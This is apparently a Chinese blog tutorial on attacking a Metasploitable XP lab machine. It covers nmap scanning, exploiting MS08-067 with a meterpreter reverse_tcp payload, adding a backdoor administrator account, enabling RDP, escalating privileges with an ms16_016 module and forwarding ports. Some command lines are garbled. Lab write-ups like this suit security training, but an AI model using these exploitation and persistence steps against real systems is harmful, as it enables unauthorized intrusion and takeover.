Metasploitable的簡單滲透測試

0x00 Metasploitable

Metasploitable漏洞演練系統(tǒng),基于ubuntu、xp操作系統(tǒng),本身設(shè)計(jì)作為安全工具測試和演示常見漏洞攻擊,他的作用是用來作為MSF攻擊用的靶機(jī),他是一個(gè)具有無數(shù)未打補(bǔ)丁漏洞與開放了無數(shù)高危端口的滲透演練系統(tǒng),可以使我們進(jìn)行練習(xí)。
本次測試使用xp系統(tǒng)的靶機(jī),下載地址

0x01 查看詳細(xì)信息

nmap -sP -T5 
nmap -P1-65535 -T4 

使用nmap進(jìn)行探測發(fā)現(xiàn),使用nmap結(jié)合腳本進(jìn)行掃描測試:

nmap -sT -A --script=smb-check-vulns -P0 192
-sT 使用TCP Connect掃描
-A 是指高級操作系統(tǒng)探測功能,對一個(gè)特定服務(wù)進(jìn)行更深的旗標(biāo)和指紋攫取
--script=smb-check-vulns 調(diào)用smb-check-vulns腳本
-P0 進(jìn)行更深層次的掃描,不進(jìn)行主機(jī)發(fā)現(xiàn).168.0.146


發(fā)現(xiàn)探測出MS08-067漏洞,使用Metasploit進(jìn)行攻擊利用。

0x02 Metasploit的利用

2.1 查找 MS08-067相關(guān)的模塊


2.2 使用選中的模塊并查看


set TARGET 5

2.2 設(shè)置攻擊參數(shù)
show options 查看一下參數(shù),確保無誤
設(shè)置PAYLOAD(攻擊載荷)
set PAYLOAD windows/meterpreter/reverse_tcp
set RHOST 192.168.1.146 設(shè)置遠(yuǎn)程主機(jī)IP地址
set LHOST 192.168.1.179 設(shè)置反向連接地址為本機(jī)IP地址
set LPORT 55555 設(shè)置本機(jī)監(jiān)聽的TCP端口號
這個(gè)載荷在攻擊成功后,會從目標(biāo)主機(jī)發(fā)起一個(gè)反彈連接,連接到LHOST中指定的IP地址。

2.3 開始攻擊,發(fā)現(xiàn)已經(jīng)上鉤;

0x03 提權(quán)

3.1 查看權(quán)限,判斷是否需要進(jìn)行提權(quán)

getuid

3.2 增加用戶名并設(shè)置為管理員

net user zjw 123 /add
net localgroup administrators zjw /add



3.3 開啟3389端口遠(yuǎn)程登錄

run getgui -e (僅僅是打開遠(yuǎn)程管理)
run getgui -u hacker -p s3cr3t(打開遠(yuǎn)程管理并且創(chuàng)造一個(gè)新的用戶名為Hacker密碼為s3cr3t的帳號)



3.4 遠(yuǎn)程連接目標(biāo)主機(jī)
rdesktop -f -a 16 192.168.0.146:3389
成功登陸目標(biāo)主機(jī)

0x04 補(bǔ)充知識

4.1 拿到shell只是普通用戶怎么辦?
上面演示的直接就是最高權(quán)限,當(dāng)然這種情況在平時(shí)滲透測試中也是比較少見的,那么我們就得進(jìn)行提權(quán)了。

meterpreter > background
msf exploit(handler) > search ms16
msf exploit(handler) > use exploit/windows/local/ms16_016_webdav
msf exploit(ms16_016_webdav) > info
msf exploit(ms16_016_webdav) > show options
msf exploit(ms16_016_webdav) > set SESSION 1    # 設(shè)置會剛才我們后門連接的ID號 1
msf exploit(ms16_016_webdav) > exploit
msf exploit(ms16_016_webdav) > sessions
msf exploit(ms16_016_webdav) > sessions -i 1
meterpreter > getuid

這是發(fā)現(xiàn)我們怎么還是普通權(quán)限,我們進(jìn)行查看進(jìn)程。然后加載我們的進(jìn)程號

meterpreter > ps
meterpreter > migrate + 進(jìn)程號

這樣已經(jīng)提升為了system權(quán)限

4.2 有時(shí)候我們在公網(wǎng)而目標(biāo)主機(jī)在內(nèi)網(wǎng)如何登陸?
這時(shí)候就要使用端口轉(zhuǎn)發(fā)來實(shí)現(xiàn)了,將目標(biāo)主機(jī)的端口轉(zhuǎn)發(fā)到我們本機(jī)。

portfwd add -l 你本機(jī)的監(jiān)聽端口 -r 127.0.0.1 -p 3389

執(zhí)行之后所有端口3389的內(nèi)網(wǎng)流量都會通過這個(gè)meterpreter的會話來轉(zhuǎn)發(fā)到你kali的127.0.0.1的指定端口上 。
假如在這里我設(shè)置的監(jiān)聽端口為2222,那么我執(zhí)行的就是

portfwd add -l 2222 -r 127.0.0.1 -p 3389

然后開始連接遠(yuǎn)程桌面。新建一個(gè)終端窗口,執(zhí)行連接Windows遠(yuǎn)程桌面的命令就OK了。

rdesktop 127.1.1.0:2222
最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時(shí)請結(jié)合常識與多方信息審慎甄別。
平臺聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡書系信息發(fā)布平臺,僅提供信息存儲服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

  • win7 cmd管理員權(quán)限設(shè)置 net localgroup administrators 用戶名 /add 把“...
    f675b1a02698閱讀 5,511評論 0 11
  • 部分內(nèi)容轉(zhuǎn)載自搜狗百科 cmd是command的縮寫.即命令提示符(CMD),是在OS / 2 , Windows...
    青冥之上閱讀 2,493評論 0 24
  • 炎夏已至,除了在時(shí)尚秀中大熱的高跟涼鞋,你還有一個(gè)不錯(cuò)的選擇—高跟運(yùn)動鞋。多年來,高跟運(yùn)動鞋滿足了很多姑娘的愿望,...
    qzuser_c168閱讀 369評論 0 0
  • 任何項(xiàng)目的報(bào)價(jià)都隱含著報(bào)價(jià)者的經(jīng)驗(yàn)。受小圓桌開發(fā)小組的委托,在此分享外包報(bào)價(jià)的一些考慮因素,希望能對接單經(jīng)驗(yàn)不足的...
    小圓桌閱讀 15,309評論 1 18
  • 想寫一首詩 想寫寫最近的天氣 晴朗了,又下雨了 一場又一場的 想寫寫心情 邊喝水邊看窗外天空飄過的云 平靜地思考 ...
    wu楓閱讀 223評論 0 1

友情鏈接更多精彩內(nèi)容